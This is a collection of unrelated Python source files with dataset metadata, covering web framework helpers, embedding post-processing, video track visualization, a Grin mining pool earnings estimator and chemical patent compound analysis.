def simulate_post(self, *args, **kwargs):
kwargs["method"] = "POST"
return self.simulate_request(*args, **kwargs)
def simulate_put(self, *args, **kwargs):
kwargs["method"] = "PUT"
return self.simulate_request(*args, **kwargs)
def simulate_delete(self, *args, **kwargs):
kwargs["method"] = "DELETE"
return self.simulate_request(*args, **kwargs)
def simulate_patch(self, *args, **kwargs):
kwargs["method"] = "PATCH"
return self.simulate_request(*args, **kwargs)
def simulate_head(self, *args, **kwargs):
kwargs["method"] = "HEAD"
return self.simulate_request(*args, **kwargs)
avg_line_length: 29.688889 | max_line_length: 66 | alphanum_fraction: 0.627246
count_classes: 1,223 (score 0.915419) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 92 (score 0.068862)
hexsha: b0cef7efc960a0a20a9e808c895f9ff5b72321b6 | size: 1,903 | ext: py | lang: Python
max_stars: src/zojax/portlet/browser/portlets.py | Zojax/zojax.portlet @ f442ae53c400cd39e0c593138b83eeea0d13787e | licenses: ["ZPL-2.1"] | count: null | events: null
max_issues: src/zojax/portlet/browser/portlets.py | Zojax/zojax.portlet @ f442ae53c400cd39e0c593138b83eeea0d13787e | licenses: ["ZPL-2.1"] | count: null | events: null
max_forks: src/zojax/portlet/browser/portlets.py | Zojax/zojax.portlet @ f442ae53c400cd39e0c593138b83eeea0d13787e | licenses: ["ZPL-2.1"] | count: null | events: null
content:
##############################################################################
#
# Copyright (c) 2009 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""
$Id$
"""
from zope import interface
from zope.location import LocationProxy
from zope.publisher.interfaces import NotFound
from zope.publisher.interfaces import IPublishTraverse
from zope.security.proxy import removeSecurityProxy
from zope.component import getAdapters, queryMultiAdapter
from zojax.statusmessage.interfaces import IStatusMessage
from zojax.portlet.interfaces import IPortletManager, IPortletsExtension
from zojax.portlet.browser.interfaces import IPortletManagerPublicMarker
class Portlets(object):
interface.implements(IPublishTraverse)
__name__ = 'portlets'
__parent__ = None
def __init__(self, context, request):
self.__parent__ = self.context = context
self.request = request
def publishTraverse(self, request, name):
context = self.context
manager = queryMultiAdapter(
(context, request, None), IPortletManager, name)
if manager is not None:
manager.update()
interface.alsoProvides(manager, IPortletManagerPublicMarker)
return LocationProxy(manager, self.context, name)
raise NotFound(self.context, self.__name__, request)
def __call__(self):
        raise NotFound(self.context, self.__name__, self.request)
avg_line_length: 33.982143 | max_line_length: 78 | alphanum_fraction: 0.683132
count_classes: 765 (score 0.401997) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 646 (score 0.339464)
hexsha: b0d04d598a11b7e88dbf9f7dcbe48c016cf93d7f | size: 2,280 | ext: py | lang: Python
max_stars: recsystem/embedder/post_embed.py | DOREMUS-ANR/recommender @ 027e0dcb3639f03204c67777e2e10aac8505a70a | licenses: ["MIT"] | count: 2 | events: 2017-03-28T15:48:18.000Z to 2018-09-06T08:50:34.000Z
max_issues: recsystem/embedder/post_embed.py | DOREMUS-ANR/recommender @ 027e0dcb3639f03204c67777e2e10aac8505a70a | licenses: ["MIT"] | count: null | events: null
max_forks: recsystem/embedder/post_embed.py | DOREMUS-ANR/recommender @ 027e0dcb3639f03204c67777e2e10aac8505a70a | licenses: ["MIT"] | count: null | events: null
content:
import os
import codecs
from shutil import copyfile
from gensim.models import KeyedVectors
from SPARQLWrapper import SPARQLWrapper, JSON
def ns_filter(embeddings_file, namespaces):
with open(embeddings_file) as file:
raw_embs = [l.strip() for l in file]
def belong_to_category(x):
for prefix in namespaces:
if x.startswith(prefix):
return True
return False
n = list(filter(belong_to_category, raw_embs))
head = '%d %s' % (len(n), raw_embs[0].split(' ')[1])
embeddings_temp = embeddings_file + "_temp"
with open(embeddings_temp, 'w') as f:
f.write("%s" % head)
for item in n:
f.write("\n%s" % item)
return embeddings_temp
def get_label(uri, endpoint):
query = "select sql:BEST_LANGMATCH(?o, 'en;q=0.9, en-gb;q=0.8, *;q=0.1', 'en') as ?label" \
" where { <%s> skos:prefLabel ?o }" % uri
sparql = SPARQLWrapper(endpoint)
sparql.setQuery(query)
sparql.setReturnFormat(JSON)
results = sparql.query().convert()
r = results["results"]["bindings"][0]
if r is None or 'label' not in r:
print(uri)
return None
return r["label"]["value"]
def main(args):
what = args.feature
if what is None:
raise RuntimeError('You must specify the feature using -f or --feature')
chosen = args.featureList[what]
namespaces = chosen['namespaces'] if 'namespaces' in chosen else False
embeddings_file = '%s/%s.emb' % (args.embDir, what)
embeddings_run = embeddings_file
copyfile(embeddings_file, embeddings_file + '_raw')
if namespaces:
embeddings_run = ns_filter(embeddings_file, namespaces)
# L2 normalisation
# https://www.quora.com/Should-I-do-normalization-to-word-embeddings-from-word2vec-if-I-want-to-do-semantic-tasks
wv_from_text = KeyedVectors.load_word2vec_format(embeddings_run)
wv_from_text.init_sims(replace=True)
labels = ['%s %s' % (uri, get_label(uri, args.endpoint)) for uri in wv_from_text.index2entity]
with codecs.open(embeddings_file + '.l', 'w', 'utf-8') as fl:
fl.write('\n'.join(labels))
wv_from_text.save_word2vec_format(embeddings_file)
if embeddings_run.endswith('_temp'):
os.remove(embeddings_run)
avg_line_length: 31.232877 | max_line_length: 117 | alphanum_fraction: 0.658333
count_classes: 0 (score 0) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 442 (score 0.19386)
hexsha: b0d08b7dcc6e66d8aad9485ee7da2eca8c60ae84 | size: 188 | ext: py | lang: Python
max_stars: raster/__init__.py | manfre-lorson/MacPyver @ 62503dae69705a25202f24615e0c7cc88e10d753 | licenses: ["Apache-2.0"] | count: 1 | events: 2021-11-03T01:49:47.000Z to 2021-11-03T01:49:47.000Z
max_issues: raster/__init__.py | manfre-lorson/MacPyver @ 62503dae69705a25202f24615e0c7cc88e10d753 | licenses: ["Apache-2.0"] | count: null | events: null
max_forks: raster/__init__.py | manfre-lorson/MacPyver @ 62503dae69705a25202f24615e0c7cc88e10d753 | licenses: ["Apache-2.0"] | count: 1 | events: 2018-07-11T09:23:45.000Z to 2018-07-11T09:23:45.000Z
content:
try:
from . import tiff
print("full tiff support")
except:
print("no tiff support")
try:
import hdf5
print("full hdf5 support")
except:
print("no hdf5 support")
avg_line_length: 13.428571 | max_line_length: 30 | alphanum_fraction: 0.62766
count_classes: 0 (score 0) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 72 (score 0.382979)
hexsha: b0d2ea6ce566b3bde93b03ec4fb9ce3e2422e739 | size: 6,292 | ext: py | lang: Python
max_stars: clustering/track_visualization.py | XiaoSanGit/wda_tracker @ b68ec0edb9daa6cc495815ba9ca549b36eec0369 | licenses: ["MIT"] | count: 24 | events: 2020-06-23T11:17:42.000Z to 2022-03-29T00:38:09.000Z
max_issues: clustering/track_visualization.py | XiaoSanGit/wda_tracker @ b68ec0edb9daa6cc495815ba9ca549b36eec0369 | licenses: ["MIT"] | count: 13 | events: 2020-07-07T03:59:02.000Z to 2022-03-30T04:28:06.000Z
max_forks: clustering/track_visualization.py | XiaoSanGit/wda_tracker @ b68ec0edb9daa6cc495815ba9ca549b36eec0369 | licenses: ["MIT"] | count: 9 | events: 2021-02-14T07:11:05.000Z to 2021-12-23T12:47:08.000Z
content:
import os
from tqdm import tqdm
import pandas as pd
from utilities.helper import get_bbox_middle_pos,drawBoundingBox
from clustering.clustering_utils import get_person_id_to_track,get_groundtruth_person_id_to_track
import cv2
from utilities.helper import *
from utilities.pandas_loader import load_csv
class Track_Visualization:
def __init__(self,dataset_base_folder,track_results_path,track_evaluation_results_path,cam_id, work_dirs,output_folder=None):
self.work_dirs = work_dirs
self.dataset_base_folder = dataset_base_folder
self.track_results_path = track_results_path
self.cam_id = cam_id
self.track_evaluation_results_path = track_evaluation_results_path
if output_folder is None:
self.output_folder = os.path.join(self.work_dirs, "clustering", "drawn_track_videos")
else:
self.output_folder = output_folder
self.track_colors = [(0,0,255),(0,255,0)]
self.track_circle_radi = [2,1]
def read_track_results(self,track_results_path):
track_results = pd.read_csv(track_results_path)
person_id_to_tracks = get_person_id_to_track(track_results)
return person_id_to_tracks
def read_ground_truth(self,person_identifier="ped_id"):
dataset_base_path = os.path.join(self.dataset_base_folder
,"cam_{}".format(self.cam_id)
,"coords_cam_{}.csv".format(self.cam_id))
ground_truth = load_csv(self.work_dirs, dataset_base_path)
ground_truth = ground_truth.groupby(["frame_no_gta", person_identifier], as_index=False).mean()
ground_truth = adjustCoordsTypes(ground_truth, person_identifier=person_identifier)
ground_truth = drop_unnecessary_columns(ground_truth)
person_id_to_track = get_groundtruth_person_id_to_track(ground_truth)
return person_id_to_track
def read_track_evaluation_results(self):
track_evaluation_results = pd.read_csv(self.track_evaluation_results_path)
return track_evaluation_results
def get_union_frame_nos(self,track1,track2):
def track_to_frame_nos(track):
result = []
for track_pos in track:
result.append(track_pos["frame_no_cam"])
return result
track1_frame_nos = track_to_frame_nos(track1)
track2_frame_nos = track_to_frame_nos(track2)
frame_no_union = set(track1_frame_nos).union(track2_frame_nos)
frame_no_union = list(frame_no_union)
frame_no_union.sort()
return frame_no_union
def draw_one_frame(self,img,until_frame_no,track,color,radius):
for track_pos in track:
bbox = track_pos["bbox"]
bbox = tuple(map(int, bbox))
person_pos = get_bbox_middle_pos(bbox)
person_pos = tuple(map(int, person_pos))
cv2.circle(img, person_pos, radius=radius, color=color, thickness=-1)
if until_frame_no == track_pos["frame_no_cam"]:
drawBoundingBox(img, bbox, color=color)
if until_frame_no <= track_pos["frame_no_cam"]:
break
def draw_all_frames(self,union_frames,tracks,hid,oid):
current_frame = union_frames[-1]
for current_frame in union_frames:
img_path = os.path.join(self.dataset_base_folder
, "cam_{}".format(self.cam_id)
, "image_{}_{}.jpg".format(current_frame, self.cam_id))
img = cv2.imread(img_path)
for track_idx,track in enumerate(tracks):
track_color = self.track_colors[track_idx % len(self.track_colors)]
circle_radius = self.track_circle_radi[track_idx % len(self.track_circle_radi)]
self.draw_one_frame(img,current_frame,track,track_color,circle_radius)
track_output_folder = os.path.join(self.output_folder,"hid_{}_oid_{}".format(hid,oid))
os.makedirs(track_output_folder,exist_ok=True)
track_output_image_path = os.path.join(track_output_folder,"image_{}_{}.jpg".format(current_frame, self.cam_id))
cv2.imwrite(track_output_image_path,img)
def run_visualization(self):
track_evaluation_results = self.read_track_evaluation_results()
gt_person_id_to_track = self.read_ground_truth()
tr_person_id_to_track = self.read_track_results(self.track_results_path)
for idx, eval_res_row in tqdm(track_evaluation_results.iterrows(),total=len(track_evaluation_results)):
hid = eval_res_row["hid"]
oid = eval_res_row["oid"]
if oid not in gt_person_id_to_track or hid not in tr_person_id_to_track:
break
gt_track = gt_person_id_to_track[oid]
tr_track = tr_person_id_to_track[hid]
union_frames = self.get_union_frame_nos(gt_track,tr_track)
self.draw_all_frames(union_frames,[gt_track,tr_track],hid,oid)
if __name__ == "__main__":
trv = Track_Visualization(dataset_base_folder="/home/philipp/Downloads/Recording_12.07.2019"
,track_results_path="/home/philipp/work_dirs/clustering/single_camera_refinement/track_results_2.txt"
,track_evaluation_results_path="/home/philipp/work_dirs/clustering/evaluation_per_track_results.csv"
,work_dirs="/home/philipp/work_dirs"
,cam_id=2)
trv = Track_Visualization(dataset_base_folder="/net/merkur/storage/deeplearning/users/koehl/gta/Recording_12.07.2019_17"
,
track_results_path="/home/koehlp/Downloads/work_dirs/clustering/single_camera_refinement/track_results_2.txt"
,
track_evaluation_results_path="/home/koehlp/Downloads/work_dirs/clustering/evaluation_per_track_results.csv"
, work_dirs="/home/koehlp/Downloads/work_dirs"
, cam_id=2
, output_folder="/net/merkur/storage/deeplearning/users/koehl/gta/drawn_tracks_matched")
trv.run_visualization()
avg_line_length: 33.827957 | max_line_length: 139 | alphanum_fraction: 0.665607
count_classes: 4,766 (score 0.75747) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 774 (score 0.123013)
hexsha: b0d30d1f5e1fa7c7ff3fa8d3f5343770ef436fc7 | size: 445 | ext: py | lang: Python
max_stars: Src/ZenCoding/zencoding/coda.py | JetBrains/ReSharperPowerToys @ 352d61acba98d71b4c7a63a1def9fe550b7a0e57 | licenses: ["Apache-2.0"] | count: 18 | events: 2015-01-22T18:18:17.000Z to 2021-11-08T09:49:53.000Z
max_issues: Src/ZenCoding/zencoding/coda.py | JetBrains/ReSharperPowerToys @ 352d61acba98d71b4c7a63a1def9fe550b7a0e57 | licenses: ["Apache-2.0"] | count: null | events: null
max_forks: Src/ZenCoding/zencoding/coda.py | JetBrains/ReSharperPowerToys @ 352d61acba98d71b4c7a63a1def9fe550b7a0e57 | licenses: ["Apache-2.0"] | count: 8 | events: 2015-05-15T19:34:04.000Z to 2022-03-19T07:00:15.000Z
content:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Coda plug-in
Created on Apr 20, 2009
@author: sergey
'''
import os
from zencoding import zen_core
from zencoding.settings import zen_settings
zen_core.newline = os.getenv('CODA_LINE_ENDING', zen_core.newline)
zen_core.insertion_point = '$$IP$$'
cur_line = 'hello world div>p'
cur_index = 17
abbr = zen_core.find_abbr_in_line(cur_line, cur_index)
if abbr:
print(zen_core.expand_abbr(abbr))
avg_line_length: 19.347826 | max_line_length: 66 | alphanum_fraction: 0.74382
count_classes: 0 (score 0) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 150 (score 0.337079)
hexsha: b0d43b5a5e1054b6e91b5c04e0aefe730f1c03da | size: 958 | ext: py | lang: Python
max_stars: Scripts/simulation/world/rentable_lot_tuning.py | velocist/TS4CheatsInfo @ b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | licenses: ["Apache-2.0"] | count: null | events: null
max_issues: Scripts/simulation/world/rentable_lot_tuning.py | velocist/TS4CheatsInfo @ b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | licenses: ["Apache-2.0"] | count: null | events: null
max_forks: Scripts/simulation/world/rentable_lot_tuning.py | velocist/TS4CheatsInfo @ b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | licenses: ["Apache-2.0"] | count: null | events: null
content:
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\world\rentable_lot_tuning.py
# Compiled at: 2014-09-09 00:07:16
# Size of source mod 2**32: 925 bytes
from sims4.tuning.tunable import TunableTuple, Tunable
from sims4.tuning.tunable_base import ExportModes
class RentableZoneTuning:
PRICE_MODIFIERS = TunableTuple(description='\n Global price modifiers for all rentable zones.\n ',
add=Tunable(description='\n Add modifier for the price to rent a lot.\n ',
tunable_type=float,
default=0.0),
multiply=Tunable(description='\n Multiplier for the price to rent a lot.\n ',
tunable_type=float,
default=1.0),
export_class_name='TunablePriceModifiers',
export_modes=(ExportModes.All))
avg_line_length: 50.421053 | max_line_length: 116 | alphanum_fraction: 0.685804
count_classes: 530 (score 0.553236) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 547 (score 0.570981)
hexsha: b0d58a0cf4141bba29b28d7f0ec53b0cea18f50b | size: 7,099 | ext: py | lang: Python
max_stars: grin-py/utils/MWGP_earningsEstimate.py | JPaulMora/grin-pool @ c980fdbcae4edeaa661d36d5b6da6f7a49beed05 | licenses: ["Apache-2.0"] | count: null | events: null
max_issues: grin-py/utils/MWGP_earningsEstimate.py | JPaulMora/grin-pool @ c980fdbcae4edeaa661d36d5b6da6f7a49beed05 | licenses: ["Apache-2.0"] | count: null | events: null
max_forks: grin-py/utils/MWGP_earningsEstimate.py | JPaulMora/grin-pool @ c980fdbcae4edeaa661d36d5b6da6f7a49beed05 | licenses: ["Apache-2.0"] | count: null | events: null
content:
#!/usr/bin/python3
# Copyright 2018 Blade M. Doyle
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
###
# Estmate MWGrinPool earnings from historic data
# Input: --days, --c29gps, --c31gps
# Algorithm:
# Get a list of the blocks found by MWGrinPool within the requested block range
# For each pool-found-block:
# Calculate the theoritical rewards for a user with provided GPS
# Generate a graph
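# Example run (hypothetical hash rates, shown only to illustrate the flags parsed below):
#   python3 MWGP_earningsEstimate.py --days 30 --c29gps 4.5 --c31gps 0.8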
import os
import sys
import argparse
from datetime import datetime, timedelta
try:
import requests
except Exception as e:
print("Error: This script requires the 'requests' module, please run `pip3 install requests`")
Graph = True
try:
import plotly
import plotly.graph_objs as go
except Exception as e:
Graph = False
mwURL = "https://api.mwgrinpool.com"
NanoGrin = 1.0/1000000000.0
SecondsInDay = float(60*60*24)
PPLNGSeconds = float(60*60*4)
def print_header():
print(" ")
print("############# MWGrinPool Average Daily Earnings #############")
print("## ")
if Graph == False:
print(" WARNING: ")
print(" This script requires the 'plotly' module to produce a graph")
print(" Please run: `pip3 install plotly`")
print(" (running in text mode)")
print(" ")
def print_footer(rewardTotal, c29gps, c31gps, numDays, startTS, endTS):
print(" ")
print(" ")
print(" Report for {} days - from: {} to: {}".format(numDays, startTS.strftime("%m-%d-%y %H:%M"), endTS.strftime("%m-%d-%y %H:%M")))
print(" Mining C29 at {}gps, C31 at {}gps".format(c29gps, c31gps))
print(" ")
print(" Total Rewards: {} Grin".format(rewardTotal))
print(" Avg Daily Reward = {} Grin".format(rewardTotal/NumDays))
print(" ")
def epoch_to_dt(epoch):
return datetime.fromtimestamp(epoch)
parser = argparse.ArgumentParser()
parser.add_argument("--days", help="Number of days to average over")
parser.add_argument("--c29gps", help="Miners C29 Graphs/second")
parser.add_argument("--c31gps", help="Miners C31 Graphs/second")
parser.add_argument("--debug", help="Print lots of debug info")
args = parser.parse_args()
print_header()
if args.days is None:
NumDays = float(input(" Number of days to average over: "))
else:
NumDays = float(args.days)
if NumDays > 62:
print(" ")
print(" -- Error: Please limit your query to 60 days to prevent excess load on our pool API")
print(" ")
sys.exit(1)
if args.c29gps is None:
C29Gps = float(input(" Miners C29 Graphs/second: "))
else:
C29Gps = float(args.c29gps)
if args.c31gps is None:
C31Gps = float(input(" Miners C31 Graphs/second: "))
else:
C31Gps = float(args.c31gps)
if args.debug is None:
    debug = False
else:
    debug = True
EndTS = datetime.now()
startTS = EndTS - timedelta(days=NumDays)
# Get a list of the pool-found-blocks within the range
poolblocksURL = mwURL + "/pool/blocks/0,1440/timestamp,height"
poolblocksJSON = requests.get(url = poolblocksURL).json()
poolblocks = [block['height'] for block in poolblocksJSON if(block['timestamp'] >= startTS.timestamp() and block['timestamp'] <= EndTS.timestamp())]
poolblocks.sort()
debug and print("Pool Blocks found in range: {}".format(poolblocks))
print(" ")
print(" Getting Mining Data: ")
rewardTotal = 0
x = [startTS]
y = [0]
debug and print("Start Time: {} - {}".format(startTS, startTS.timestamp()))
debug and print("End Time: {} - {}".format(EndTS, EndTS.timestamp()))
debug or sys.stdout.write(" ")
sys.stdout.flush()
for blockHeight in poolblocks:
# For each pool block, get some information:
# Secondary Scale Value
# Any TX fees included in the block reward
grinBlockURL = mwURL + "/grin/block/{}/timestamp,height,secondary_scaling,fee".format(blockHeight)
grinblockJSON = requests.get(url = grinBlockURL).json()
# Pool GPS at that block height
poolGpsURL = mwURL + "/pool/stat/{}/gps".format(blockHeight)
poolGpsJSON = requests.get(url = poolGpsURL).json()
# Calculate theoretical miners reward
scale = (2**(1+31-24)*31)/float(max(29, grinblockJSON['secondary_scaling']))
minerValue = C29Gps + C31Gps*scale
poolValue = 0
for gps in poolGpsJSON['gps']:
if gps['edge_bits'] == 29:
poolValue += gps['gps']
else:
poolValue += gps['gps']*scale
debug and print("Miner value: {}, pool value: {}".format(minerValue, poolValue))
fullMinersReward = (minerValue/poolValue)*(60+grinblockJSON['fee']*NanoGrin)
tsNow = datetime.fromtimestamp(grinblockJSON['timestamp'])
timedelta = tsNow - startTS
# Check if we get the full reward or not
if(timedelta.total_seconds() < PPLNGSeconds):
minersReward = fullMinersReward * (timedelta.total_seconds()/PPLNGSeconds)
else:
minersReward = fullMinersReward
debug and print(" + Miners reward for {} block {}: {}".format(datetime.fromtimestamp(grinblockJSON['timestamp']).strftime('%c'), blockHeight, minersReward))
rewardTotal += minersReward
# Graph
x.append(tsNow)
timedelta = tsNow - startTS
debug and print("timedelta = {}".format(timedelta))
daysSinceStartTS = float(timedelta.total_seconds())/float(SecondsInDay)
debug and print("daysSinceStartTS = {}".format(daysSinceStartTS))
y.append(rewardTotal/daysSinceStartTS)
debug and print(" ")
debug or sys.stdout.write(".")
sys.stdout.flush()
x.append(EndTS)
y.append(rewardTotal/NumDays)
print_footer(rewardTotal, C29Gps, C31Gps, NumDays, startTS, EndTS)
if Graph == True:
print("Generating graph...")
graphName = "Avg Daily Reward: {} Grin".format(round(rewardTotal/NumDays, 2))
graphData = [go.Scatter(x=x, y=y, name=graphName)]
graphLayout = go.Layout(
title=go.layout.Title(text=graphName),
xaxis=go.layout.XAxis(
title=go.layout.xaxis.Title(
text='Time',
font=dict(
family='Courier New, monospace',
size=18,
color='#008000'
)
)
),
yaxis=go.layout.YAxis(
title=go.layout.yaxis.Title(
text='Grin',
font=dict(
family='Courier New, monospace',
size=18,
color='#008000'
)
)
),
)
graphFigure = go.Figure(data=graphData, layout=graphLayout)
graph_name = "estimate-{}days.html".format(NumDays)
plotly.offline.plot(graphFigure, filename=graph_name)
avg_line_length: 35.318408 | max_line_length: 162 | alphanum_fraction: 0.646993
count_classes: 0 (score 0) | count_generators: 0 (score 0) | count_decorators: 0 (score 0) | count_async_functions: 0 (score 0) | count_documentation: 2,695 (score 0.379631)
hexsha: b0d7ebc0b913cd1eef91933fd5bfa8848faaf124 | size: 10,700 | ext: py | lang: Python
max_stars: cpd_analysis.py | jfmalloy1/Patents @ 734e62497acfbd9be42980b310379979415ab924 | licenses: ["MIT"] | count: null | events: null
max_issues: cpd_analysis.py | jfmalloy1/Patents @ 734e62497acfbd9be42980b310379979415ab924 | licenses: ["MIT"] | count: null | events: null
max_forks: cpd_analysis.py | jfmalloy1/Patents @ 734e62497acfbd9be42980b310379979415ab924 | licenses: ["MIT"] | count: null | events: null
content:
# import igraph as ig
# import numpy as np
import pickle
import pandas as pd
from tqdm import tqdm
import os
import heapq
import scipy.stats as stats
from random import sample
def build_cpd_df(fp):
""" Takes 29 separate compound data files and combines them into a single pandas dataframe for ease of access
Args:
fp (string): Filepath to SureChemBL data files (assuming G drive goes to jmalloy3 Google Account)
Returns:
None - but does write a pickled dataframe to SureChemBL_Patents/Cpd_Data/ directory
"""
dfs = []
for f in tqdm(os.listdir(fp)):
if f.endswith(".txt"):
dfs.append(pd.read_csv(fp + f, sep="\t", header=0))
df = pd.concat(dfs, ignore_index=True)
print(df)
pickle.dump(df, file=open(fp + "SureChemBL_allCpds.p", "wb"))
del df
def find_highest_degrees(df, n, start, stop):
""" Finds the n highest-degree compounds within a specific date range
Saves various data associated with those n comopunds - smiles, inchi,
inchikey, degree, preferential attachment value
Args:
df (pandas dataframe): dataframe containing all SureChemBL compounds
n (int): the number of highest-degree compounds to select
start (int): 1st year of the range
stop (int): last year of the range
"""
print("----------", start, stop, "----------")
#Finding the top 10 preferential attachment compounds (from 1980-1984 as a test)
full_id_degrees = pickle.load(file=open(
"G:\\Shared drives\\SureChemBL_Patents\\Degrees\\full_id_degrees_" +
str(start) + "_" + str(stop) + ".p", "rb"))
pref_attach_dict = pickle.load(file=open(
"G:\\Shared drives\\SureChemBL_Patents\\pref_attach_dict_" +
str(start) + "_" + str(stop) + ".p", "rb"))
#Find n compounds with largest degree
highest_degree_cpds = heapq.nlargest(n,
full_id_degrees,
key=full_id_degrees.get)
highest_degree_cpds_df = df[df["SureChEMBL_ID"].isin(highest_degree_cpds)]
pref_attach_values = list(pref_attach_dict.values())
#Extra information to be added to the csv output file
degrees = []
pref_attach_highestCpd_values = []
pref_attach_percentiles = []
for cpd in tqdm(highest_degree_cpds_df["SureChEMBL_ID"]):
#Degree of compound
degrees.append(full_id_degrees[cpd][-1])
#Preferential attachment value
pref_attach_highestCpd_values.append(pref_attach_dict[cpd])
#Percentile of preferential attachment value
pref_attach_percentiles.append(
stats.percentileofscore(pref_attach_values, pref_attach_dict[cpd]))
highest_degree_cpds_df["degree"] = degrees
highest_degree_cpds_df["pref_attach_value"] = pref_attach_highestCpd_values
highest_degree_cpds_df["pref_attach_percentile"] = pref_attach_percentiles
highest_degree_cpds_df.to_csv(
"G:\\Shared drives\\SureChemBL_Patents\\Cpd_Data/highest_degree_data_" +
str(start) + "_" + str(stop) + "_1000.csv")
print()
def find_llanos_cpds(fp, df):
""" Tests various compounds found in Llanos et al (2019) in SureChemBL data
Llanos et al used Reaxys data to find the most popular compounds. This checks
where those compounds appear, if at all, in SureChembL patent data
Args:
df (pandas dataframe): dataframe of all SureChemBL chemistry
"""
cpds_1980_2015_inchi = {
"acetic anhydride":
"InChI=1S/C4H6O3/c1-3(5)7-4(2)6/h1-2H3",
"methanol":
"InChI=1S/CH4O/c1-2/h2H,1H3",
"methyl iodide":
"InChI=1S/CH3I/c1-2/h1H3",
"diazomethane":
"InChI=1S/CH2N2/c1-3-2/h1H2",
"formaldehyde":
"InChI=1S/CH2O/c1-2/h1H2",
"benzaldehyde":
"InChI=1S/C7H6O/c8-6-7-4-2-1-3-5-7/h1-6H",
"copper(II) oxide":
"InChI=1S/Cu.O",
"ethanol":
"InChI=1S/C2H6O/c1-2-3/h3H,2H2,1H3",
"benzoyl chloride":
"InChI=1S/C7H5ClO/c8-7(9)6-4-2-1-3-5-6/h1-5H",
"carbon monoxide":
"InChI=1S/CO/c1-2",
"water (2000)":
"InChI=1S/H2O/h1H2",
"Trifluoroacetic acid (2000)":
"InChI=1S/C2HF3O2/c3-2(4,5)1(6)7/h(H,6,7)",
"Phenylacetylene (2000)":
"InChI=1S/C8H6/c1-2-8-6-4-3-5-7-8/h1,3-7H",
"benzyl bromide (2000)":
"InChI=1S/C7H7Br/c8-6-7-4-2-1-3-5-7/h1-5H,6H2"
}
#Find stats for Llanos compounds - use 2015 data for stats (I really need to make a consensus graph)
full_id_degrees = pickle.load(file=open(
"G:\\Shared drives\\SureChemBL_Patents\\Degrees\\full_id_degrees_2015_2019.p",
"rb"))
pref_attach_dict = pickle.load(file=open(
"G:\\Shared drives\\SureChemBL_Patents\\pref_attach_dict_2015_2019.p",
"rb"))
pref_attach_values = list(pref_attach_dict.values())
#Loop through Llanos compounds
with open(fp + "llanos_cpds.csv", "a") as f:
f.write(
"name,inchi,SureChemBL_ID,degree,pref_attach_value,pref_attach_percentile\n"
)
for name, inchi in cpds_1980_2015_inchi.items():
s = df[df["InChI"] == inchi]
if not s.empty: #if SureChemBL holds that compound, save id & stats
#Degree of compound
degree = full_id_degrees[s.iloc[0]["SureChEMBL_ID"]][-1]
#Preferential attachment value
pref_attach_value = pref_attach_dict[s.iloc[0]["SureChEMBL_ID"]]
#Percentile of preferential attachment value
pref_attach_percentile = stats.percentileofscore(
pref_attach_values,
pref_attach_dict[s.iloc[0]["SureChEMBL_ID"]])
f.write(name + ",\"" + inchi + "\"," +
s.iloc[0]["SureChEMBL_ID"] + "," + str(degree) + "," +
str(pref_attach_value) + "," +
str(pref_attach_percentile) + "\n")
else: #if not, no name nor stats
f.write(name + ",\"" + inchi + "\",na,na,na,na\n")
def build_month_increments(start, stop):
""" Build all monthly increments from the start year to stop year in the
format YEAR-MONTH
Args:
start (int): start year of increments
stop (int): end year of increments
Returns:
list: list of strings holding the YEAR-MONTH increments
"""
months = []
while start <= stop:
for month in [
"01", "02", "03", "04", "05", "06", "07", "08", "09", "10",
"11", "12"
]:
months.append(str(start) + "-" + month)
start += 1
return months
def sample_compounds_unique(n, months, cpds, cpd_df):
""" Sample compounds which are uniquely added in a specific month
This uniquess is determined by determing when a compound is added in a month
and has not been present in the patent record before that month.
Args:
n (int): Number of compounds to sample every month
months (list): list of months to sample from
cpds (list): all SureChemBL IDs of compounds added in a specific month
cpd_df (pandas dataframe): Master dataframe of all compounds
"""
sample_inchis = {}
print("----- Sampling unique compounds -----")
for i in tqdm(range(len(months))):
offset = 216 #Account for starting in 1980 instead of 1962
#Only sample if there are more than 1000 compounds
if len(cpds[i+offset]) > n:
sample_cpds = sample(cpds[i+offset], n)
else:
sample_cpds = cpds[i+offset]
sub_df = cpd_df[cpd_df["SureChEMBL_ID"].isin(sample_cpds)]
sample_inchis[months[i]] = list(sub_df["InChI"])
print("\n----- Saving compounds -----")
pickle.dump(sample_inchis, file=open("Data/sample_inchi_1000_NEW.p", "wb"))
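# Clarifying note on the offset used in sample_compounds_unique above (added for exposition,
# not in the original script): the per-month compound lists start at 1962 while sampling
# starts at 1980, so the index offset is (1980 - 1962) * 12 = 216 months.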
